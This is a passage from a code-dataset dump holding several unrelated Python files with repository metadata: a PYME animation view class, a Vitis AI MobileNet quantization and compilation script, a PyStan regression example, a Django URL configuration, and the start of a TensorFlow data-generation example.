combined_rotation_dcm[0]\n view.vec_back = combined_rotation_dcm[1]\n view.vec_right = combined_rotation_dcm[2]\n \n \n\nclass VideoView(View):\n JSON_DURATION = 'duration'\n \n class Interp_mode(Enum):\n LINEAR = 0\n SQUARE = 1\n SQUARE_ROOT = 2\n SMOOTH_STEP_A = 3\n SMOOTH_STEP_B = 4\n \n def __init__(self, view_id='id', vec_up=[0,1,0], vec_back = [0,0,1], vec_right = [1,0,0], translation= [0,0,0], scale=1,\n clipping=dummy_clipping,\n duration = 1.0, interp_mode=Interp_mode.SMOOTH_STEP_B.name,\n# lut_draw=True, scale_bar=1000., background_color=[0,0,0],\n *args, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n view_id is up to you, as long as serializable with json\n vec_up np.array\n vec_back np.array\n vec_right np.array\n translation np.array\n zoom usually a scalar\n duration duration of the view transition in seconds\n \"\"\"\n super(VideoView, self).__init__(view_id, vec_up, vec_back, vec_right, translation, scale, clipping,\n# lut_draw, scale_bar, background_color,\n *args, **kwargs)\n self._duration = float(duration)\n self.interp_mode = VideoView.Interp_mode[interp_mode]\n \n @classmethod\n def from_canvas(cls, canvas, vec_id, duration=1.0, interp_mode=Interp_mode.SMOOTH_STEP_B):\n # reads state from canvas\n # Probably needs updating when PYME updates\n view = canvas.get_view(vec_id) #already a copy, but copy again anyway in case base code changes, can be the basic View class. Not for copying\n args = list([view.view_id,\n view.vec_up,\n view.vec_back,\n view.vec_right,\n view.translation,\n view.scale,\n view.clipping,\n duration,\n interp_mode.name,\n view.clip_plane_orientation,\n view.clip_plane_position,])\n# print(canvas.AxesOverlayLayer)\n args.extend([canvas.LUTDraw,\n canvas.scaleBarLength,\n canvas.clear_colour,\n canvas.AxesOverlayLayer.visible,\n # canvas.layers[0].alpha,\n # canvas.layers[0].point_size,\n ])\n layers_args = list()\n for layer in canvas.layers:\n temp_dict = OrderedDict()\n temp_dict[\"alpha\"] = layer.alpha\n temp_dict[\"point_size\"] = layer.point_size\n layers_args.append(temp_dict)\n args.append(layers_args)\n\n return cls(*args)\n \n# @classmethod\n# def from_view(cls, view, duration=3.0, interp_mode=Interp_mode.SMOOTH_STEP_B):\n# return cls(view.view_id,\n# view.vec_up,\n# view.vec_back,\n# view.vec_right,\n# view.translation,\n# view.scale,\n# view.clipping,\n# duration,\n# interp_mode.name,\n# view.clip_plane_orientation,\n# view.clip_plane_position,\n## view.lut_draw,\n## view.scale_bar,\n## view.background_color,\n# )\n \n @property\n def duration(self):\n return self._duration\n \n @duration.setter\n def duration(self, value):\n if value:\n self._duration = float(value)\n \n def to_json(self):\n ordered_dict = super(VideoView, self).to_json()\n ordered_dict[self.JSON_DURATION] = self._duration\n ordered_dict['interp_mode'] = self.interp_mode.name\n return ordered_dict\n \n @classmethod\n def decode_json(cls, json_obj):\n # # if '__type__' in json_obj and json_obj['__type__'] == View:\n # return VideoView(View.get_json_field(json_obj, View.JSON_VIEW_ID, 'id'),\n # View.get_json_array(json_obj, View.JSON_VEC_UP, numpy.array([0, 1, 0])),\n # View.get_json_array(json_obj, View.JSON_VEC_BACK, numpy.array([0, 0, 1])),\n # View.get_json_array(json_obj, View.JSON_VEC_RIGHT, numpy.array([1, 0, 0])),\n # View.get_json_array(json_obj, View.JSON_TRANSLATION, numpy.array([0, 0, 0])),\n # View.get_json_field(json_obj, View.JSON_ZOOM, 1),\n # View.get_json_field(json_obj, VideoView.JSON_DURATION, 1))\n layers = []\n for key, val in json_obj.items():\n 
if key.startswith(\"layer\"):\n layer_num = int(key.split(\"_\")[0][5:])\n while layer_num >= len(layers):\n layers.append(OrderedDict())\n layers[layer_num][\"_\".join(key.split(\"_\")[1:])] = val\n json_obj.pop(key)\n\n json_obj[\"layers\"] = layers\n return cls(**json_obj)\n\n\nif __name__ == '__main__':\n view = View(1, np.array([1, 1, 1]), np.array([2, 2, 2]), np.array([3, 3, 3]),\n np.array([0, 0, 0]), 5)\n a = json.loads(json.dumps(view.to_json()))\n view2 = View.decode_json(a)\n", "repo_name": "kkhchung/pyme-animation", "sub_path": "animation/plugins/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 15796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "PYME.LMVis", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 58, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 194, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_dcm", "line_number": 213, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 213, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Slerp", "line_number": 216, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Slerp", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 221, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Rotation.from_dcm", "line_number": 253, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 253, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.deg2rad", "line_number": 255, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation.from_rotvec", "line_number": 256, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", 
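For reference, the layer-key regrouping that decode_json performs in the record above can be isolated into a small helper. This is a minimal, self-contained sketch of the same idea, not the package's API; the helper name and example values are illustrative. Iterating over a snapshot (list(json_obj.items())) is what makes popping keys safe on Python 3, where mutating a dict during iteration raises RuntimeError.

from collections import OrderedDict

def regroup_layer_keys(json_obj):
    # Collect flat 'layer<N>_<field>' keys into a list of per-layer dicts.
    layers = []
    for key, val in list(json_obj.items()):  # snapshot: safe to pop below
        if key.startswith("layer"):
            layer_num = int(key.split("_")[0][5:])  # 'layer12_alpha' -> 12
            while layer_num >= len(layers):
                layers.append(OrderedDict())
            layers[layer_num]["_".join(key.split("_")[1:])] = val
            json_obj.pop(key)
    json_obj["layers"] = layers
    return json_obj

# {'layer0_alpha': 0.5, 'layer1_alpha': 0.9, 'scale': 1}
#   -> {'scale': 1, 'layers': [{'alpha': 0.5}, {'alpha': 0.9}]}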
"line_number": 256, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 267, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 323, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 389, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 390, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 390, "usage_type": "call"}]} +{"seq_id": "29497260519", "text": "import os \nimport argparse\nimport time\nimport sys\nfrom myUtils import DatasetGenerator\nimport tensorflow as tf\nfrom tensorflow_model_optimization.quantization.keras import vitis_quantize\n\n\"\"\"\n./docker_run.sh xilinx/vitis-ai:1.3.411\n\nAttention to 1/31 [..............................] - ETA: 0sKilled that means the RAM is not enougth\n\"\"\"\n\ndef getDataset(path, imageSize, start, stop):\n # datasetPath = os.path.join(path, f\"dataset_{imageSize}_{start}_{stop}\")\n # if not os.path.exists(datasetPath):\n t0 = time.time()\n print(\"\\nStart make dataset\")\n print(path)\n print(f\"Start image index: {start}\")\n print(f\"Stop image index: {stop}\")\n print(f\"imageSize: {imageSize}\")\n datasetGenerator = DatasetGenerator(batch_size=32, startImageNumber=start, stopImageNumber=stop, width=imageSize, height=imageSize)\n batchedDataset = datasetGenerator.make_dataset()\n # print(f\"Number of images: {len(batchedDataset)}\")\n # print(f\"Dataset spec: {batchedDataset.element_spec}\") # (TensorSpec(shape=(32,), dtype=tf.float32, name=None), TensorSpec(shape=(32,), dtype=tf.float32, name=None))\n t1 = time.time()\n print(f\"Stop make dataset. Time: {t1-t0}\")\n # print(\"Saving dataset on disk\")\n # tf.data.experimental.save(batchedDataset, datasetPath)\n # t1 = time.time()\n # print(f\"Dataset saved on disk. Time: {t1-t0}\")\n \n # else:\n # print(\"Loading Dataset from disk\")\n # t0 = time.time()\n # batchedDataset = tf.data.experimental.load(datasetPath, element_spec=(tf.TensorSpec(shape=[32,imageSize,imageSize,3], dtype=tf.float32), tf.TensorSpec(shape=[32,1], dtype=tf.float32)))\n # print(f\"Number of images: {len(batchedDataset)}\")\n # t1 = time.time()\n # print(f\"Dataset loaded. Time: {t1-t0}\")\n\n return batchedDataset\n\ndef quantization(model, preprocessQuantDataPath, alpha, imageSize, start, stop):\n batchedQuantDataset = getDataset(preprocessQuantDataPath, imageSize, start, stop)\n\n print(\"Start Quantization\")\n t0 = time.time()\n quantizer = vitis_quantize.VitisQuantizer(model)\n quantized_model = quantizer.quantize_model(calib_dataset=batchedQuantDataset)\n quantized_model.save(os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\"))\n t1 = time.time()\n print(f\"Stop Quantization. 
Time: {t1-t0}\")\n\ndef validation(preprocessValDataPath, alpha, imageSize, start, stop):\n batchedValidationDataset = getDataset(preprocessValDataPath, imageSize, start, stop)\n\n print(\"Start Validation of the quantized model\")\n t0 = time.time()\n with vitis_quantize.quantize_scope():\n modelPath = os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\")\n quantized_model = tf.keras.models.load_model(modelPath, compile=False)\n\n quantized_model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Validation accuracy:\")\n quantized_model.evaluate(batchedValidationDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. Time: {t1-t0}\")\n\ndef validateOriginalTf2Model(model, preprocessValDataPath, alpha, imageSize, start, stop):\n batchedValidationDataset = getDataset(preprocessValDataPath, imageSize, start, stop)\n model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Start validate original tf2 model\")\n print(\"Validation accuracy:\")\n t0 = time.time()\n model.evaluate(batchedValidationDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. Time: {t1-t0}\")\n\ndef validateOriginalTf2Model_withTf2utilsPreprocess(alpha, imageSize, start, stop):\n i = tf.keras.layers.Input([None, None, 3], dtype = tf.uint8)\n x = tf.cast(i, tf.float32)\n x = tf.keras.applications.mobilenet.preprocess_input(x)\n core = tf.keras.applications.MobileNet(alpha=alpha, input_shape=(imageSize,imageSize,3))\n x = core(x)\n model = tf.keras.Model(inputs=[i], outputs=[x])\n\n datasetGenerator = DatasetGenerator(batch_size=32, startImageNumber=start, stopImageNumber=stop, width=imageSize, height=imageSize)\n batchedDataset = datasetGenerator.make_dataset_without_preprocessing()\n\n model.compile(\t\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics= [tf.keras.metrics.SparseCategoricalAccuracy(), tf.keras.metrics.SparseTopKCategoricalAccuracy(k=5)]) \n print(\"Start validate original tf2 model\")\n print(\"Validation accuracy:\")\n t0 = time.time()\n model.evaluate(batchedDataset, verbose=2)\n t1 = time.time()\n print(f\"Stop Validation. 
Time: {t1-t0}\")\n\ndef compiler(dpu, alpha, imageSize):\n outputPath = os.path.join(\"tf2_vai_compiled_models\", dpu, f\"tf2_mobilenet_v1_{alpha}_{imageSize}_{dpu}\")\n quantModelPath = os.path.join(\"tf2_vai_quant_models\",f\"quantized_mobilenet_{alpha}_{imageSize}.h5\")\n archPath = os.path.join(\"Arch_files\", f\"arch_{dpu}.json\")\n\n if os.path.exists(outputPath) is False:\n os.makedirs(outputPath)\n\n \n shell_command = f\"vai_c_tensorflow2 \\\n -m {quantModelPath} \\\n -a {archPath} \\\n -o {outputPath} \\\n -n tf2mobilenet_v1_{alpha}_{imageSize}_{dpu}\" \n\n stream = os.popen(shell_command)\n output = stream.read()\n print(output)\n \n\ndef main():\n alphaChoices = [1.0, 0.75, 0.5, 0.25]\n imageSizeChoices = [224, 192, 160, 128]\n dpuChoices = [\"B4096\", \"B3136\", \"B2304\", \"B1600\", \"B1152\", \"B1024\", \"B800\", \"B512\"]\n tfModelsPath = os.path.join(\"tf_models\")\n preprocessValDataPath = os.path.join(\"tf2_preprocessDatasets\", \"validationDatasets\")\n preprocessQuantDataPath = os.path.join(\"tf2_preprocessDatasets\", \"quantizationDatasets\")\n\n if not os.path.exists(tfModelsPath):\n os.mkdir(tfModelsPath)\n\n if not os.path.exists(preprocessValDataPath):\n os.makedirs(preprocessValDataPath)\n\n if not os.path.exists(preprocessQuantDataPath):\n os.makedirs(preprocessQuantDataPath)\n \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-a\", \"--alpha\", type=float, default=1.0, choices=alphaChoices, help=\"Default: 1.0\")\t\n parser.add_argument(\"-s\", \"--imageSize\", type=int, default=224, choices=imageSizeChoices, help=\"Default: 224\")\n parser.add_argument(\"--startQuant\", type=int, default=0)\n parser.add_argument(\"--stopQuant\", type=int, default=1024)\n parser.add_argument(\"--startVal\", type=int, default=1024)\n parser.add_argument(\"--stopVal\", type=int, default=2048)\n parser.add_argument(\"-d\", \"--dpu\", type=str, default=\"B4096\",choices=dpuChoices , help=\"Default: B4096\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"-q\", \"--quantize\", action='store_true', help=\"If you want start the quantization -q\")\n parser.add_argument(\"--validate\", action=\"store_true\", help=\"If you want to validate the quantized model --validate\") \n parser.add_argument(\"--validateOriginal\", action=\"store_true\", help=\"If you want to validate the original tf2 model --validateOriginal\")\n parser.add_argument(\"-c\", \"--compile\", action='store_true', help=\"If you want start the compilation -q\")\n # parser.add_argument(\"-o\", \"--outputLayer\", type=str, default=\"MobilenetV1/Predictions/Reshape\") # MobilenetV1/Predictions/Reshape_1\n args = parser.parse_args()\n\n print(\"************************************\")\n print(\"INPUT PARAMETERS:\")\n print(f\"\\tmodel: mobilenet_v1_{args.alpha}_{args.imageSize}\")\n print(f\"\\tDPU: {args.dpu}\")\n # print(f\"\\tOutput Layer: {args.outputLayer}\")\n print(f\"\\tExecute quantization: {args.quantize}\")\n print(f\"\\tExecute compilation: {args.compile}\")\n print(\"************************************\")\n\n model = tf.keras.applications.MobileNet(alpha=args.alpha, input_shape=(args.imageSize,args.imageSize,3))\n\n modelPath = os.path.join(tfModelsPath, f\"tf2_mobilenet_v1_{args.alpha}_{args.imageSize}\")\n if not os.path.exists(modelPath):\n model.save(modelPath)\n model = tf.keras.applications.MobileNet(alpha=args.alpha, input_shape=(args.imageSize,args.imageSize,3))\n else:\n model = tf.keras.models.load_model(modelPath, compile=False)\n\n if 
args.verbose:\n print(model.summary())\n\n if args.quantize: \n quantization(model, preprocessQuantDataPath, args.alpha, args.imageSize, args.startQuant, args.stopQuant)\n\n if args.validate:\n validation(preprocessValDataPath, args.alpha, args.imageSize, args.startVal, args.stopVal)\n\n if args.validateOriginal:\n # validateOriginalTf2Model(model, preprocessValDataPath, args.alpha, args.imageSize, args.startVal, args.stopVal)\n validateOriginalTf2Model_withTf2utilsPreprocess(args.alpha, args.imageSize, args.startVal, args.stopVal)\n\n if args.compile:\n compiler(args.dpu, args.alpha, args.imageSize)\n \n\nif __name__ == \"__main__\":\n main()", "repo_name": "GabrieleCuni/Xilinx-Flow", "sub_path": "tf2_vai_flow.py", "file_name": "tf2_vai_flow.py", "file_ext": "py", "file_size_in_byte": 9114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "myUtils.DatasetGenerator", "line_number": 24, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize.VitisQuantizer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize.quantize_scope", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow_model_optimization.quantization.keras.vitis_quantize", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 67, "usage_type": "call"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": 
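The quantize/validate pair in the record above reduces to a short calibrate-save-reload-evaluate cycle. Below is a hedged sketch of that cycle under the same imports; the function name, paths, and datasets are illustrative, while the vitis_quantize calls are exactly the ones the script itself uses.

import tensorflow as tf
from tensorflow_model_optimization.quantization.keras import vitis_quantize

def quantize_and_check(float_model, calib_ds, val_ds, out_path='quantized.h5'):
    # Post-training quantization: calibrate on a small slice of data.
    quantizer = vitis_quantize.VitisQuantizer(float_model)
    q_model = quantizer.quantize_model(calib_dataset=calib_ds)
    q_model.save(out_path)
    # Quantized layers only deserialize inside quantize_scope().
    with vitis_quantize.quantize_scope():
        q_model = tf.keras.models.load_model(out_path, compile=False)
    q_model.compile(
        loss=tf.keras.losses.SparseCategoricalCrossentropy(),
        metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
    return q_model.evaluate(val_ds, verbose=2)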
"tensorflow.keras.layers.Input", "line_number": 86, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.mobilenet.preprocess_input", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Model", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 91, "usage_type": "attribute"}, {"api_name": "myUtils.DatasetGenerator", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseCategoricalAccuracy", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.SparseTopKCategoricalAccuracy", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 112, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 141, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 144, "usage_type": "call"}, {"api_name": 
"tensorflow.keras.applications.MobileNet", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.MobileNet", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 176, "usage_type": "attribute"}]} +{"seq_id": "36845038646", "text": "import pystan\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('seaborn-darkgrid')\n\nbayesreg_code = \"\"\"\ndata {\n int N;\n vector[N] x;\n vector[N] y;\n}\nparameters {\n real beta;\n real alpha;\n real sigma;\n}\nmodel {\n beta ~ normal(0, 1);\n alpha ~ normal(0, 1);\n sigma ~ normal(0, 1);\n \n y ~ normal(beta * x + alpha, sigma);\n}\n \n\"\"\"\n\nx = np.random.normal(loc=5, scale=10, size=50)\n\nbayesreg_data = {'N': 50,\n 'x': x,\n 'y': 2.0 * x + 3.0 + np.random.randn(50)}\n\nsm = pystan.StanModel(model_code=bayesreg_code)\nfit = sm.sampling(data=bayesreg_data, iter=1000, chains=4)\n\nprint(fit)\n\nbeta = fit.extract(permuted=True)['beta']\nalpha = fit.extract(permuted=True)['alpha']\nsigma = fit.extract(permuted=True)['sigma']\n\nnp.mean(beta, axis=0)\nnp.mean(alpha, axis=0)\nnp.mean(sigma, axis=0)\n\nfit.plot()\nplt.show()\n", "repo_name": "pnickl/pystan-examples", "sub_path": "pystan_examples/bayesreg.py", "file_name": "bayesreg.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pystan.StanModel", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "4876198838", "text": "from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom filebrowser.sites import site\n\nadmin.autodiscover()\nfrom content.urls import urlpatterns as content_paterns\n\nurlpatterns = patterns('',\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^media/(?P.*)$', 
'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n (r'^static/(?P<path>.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n\t\t (r'^products/', include('products.urls')), # products URLS\n (r'^grappelli/', include('grappelli.urls')), # grappelli URLS\n (r'^admin/', include(admin.site.urls)), # admin site\n url(r'^admin/filebrowser/', include(site.urls)),\n (r'^tinymce/', include('tinymce.urls')),\n\n\n)\nurlpatterns += content_paterns\n", "repo_name": "gloryofrobots/ferrite_mc", "sub_path": "fmc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 8, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.include", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "filebrowser.sites.site.urls", "line_number": 23, "usage_type": "attribute"}, {"api_name": "filebrowser.sites.site", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "content.urls.urlpatterns", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "37574660793", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: Code Doctor Studio \n@WeChat official account: xiangyuejiqiren (more articles and learning materials inside)\n@source: companion code for <深度学习之TensorFlow工程化项目实战> (700+ pages)\n@companion-code support: bbs.aianaconda.com (all questions answered)\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Generate simulated data in memory\ndef GenerateData(batchsize = 100):\n train_X = np.linspace(-1, 1, batchsize) # train_X: 100 evenly spaced floats between -1 and 1\n train_Y = 2 